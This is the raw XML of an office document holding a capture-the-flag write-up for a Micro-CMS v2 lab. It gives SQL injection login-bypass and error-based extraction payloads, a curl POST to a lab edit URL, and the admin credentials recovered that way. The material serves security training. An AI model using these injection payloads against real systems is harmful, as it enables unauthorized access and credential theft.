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TOPIC 2 </w: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35320" cy="12109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21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451.5pt;height:95.2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795" cy="190627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80" cy="190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450.75pt;height:150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795" cy="36683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80" cy="366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450.75pt;height:288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795" cy="366839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80" cy="366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450.75pt;height:288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25795" cy="1649095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80" cy="164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450.75pt;height:129.7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477000" cy="733425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7334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pt;height:57.7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==========</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val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Micro-CMS v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Objective </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>=================</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Flag </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1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======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0" w:name="6997"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The first flag can be obtained by trying to log in as admin using SQL injection. Login </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Username</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">admin’ union select ‘123’ as password FROM admins WHERE ‘1’ = ‘1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Password</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
        </w:rPr>
        <w:t>123</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:bidi w:val="0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Click the “Private Page” after login and you’ll see the flag.</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>==========================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Flag 2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=========</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="b33a"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr/>
        <w:t>Using curl to directly POST to the edit url gets the flag.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0a01"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">curl -v -X POST </w:t>
      </w:r>
      <w:hyperlink r:id="rId2" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://35.190.155.168/29f57ff6be/page/edit/2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=====================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Flag3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=============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" w:name="2fb1"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">We need to use SQL injection to get the actual admin username and password. We already know there is a table named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t xml:space="preserve">admins </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">that definitely has columns named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t xml:space="preserve">username </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t xml:space="preserve">password </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>based on the error messages seen before: One is ‘Unkown user’, the other is ‘Invalid password’.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" w:name="4f4a"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Test 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>username=foo' OR (select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(admins.username as char),0x27,0x7e) FROM `level2`.admins LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1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Test 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>username=foo' OR (select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(admins.password as char),0x27,0x7e) FROM `level2`.admins LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="3d02"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>There it is, now useu sername=dario and password=antonette to login and you’ll see the 3rd flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t xml:space="preserve">maybe use burpsuite attack to find username and password </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr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5.190.155.168/29f57ff6be/page/edit/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LibreOffice/6.3.5.2$Linux_X86_64 LibreOffice_project/30$Build-2</Application>
  <Pages>2</Pages>
  <Words>210</Words>
  <Characters>1333</Characters>
  <CharactersWithSpaces>1527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2020-04-26T12:44:12Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-26T13:00:47Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>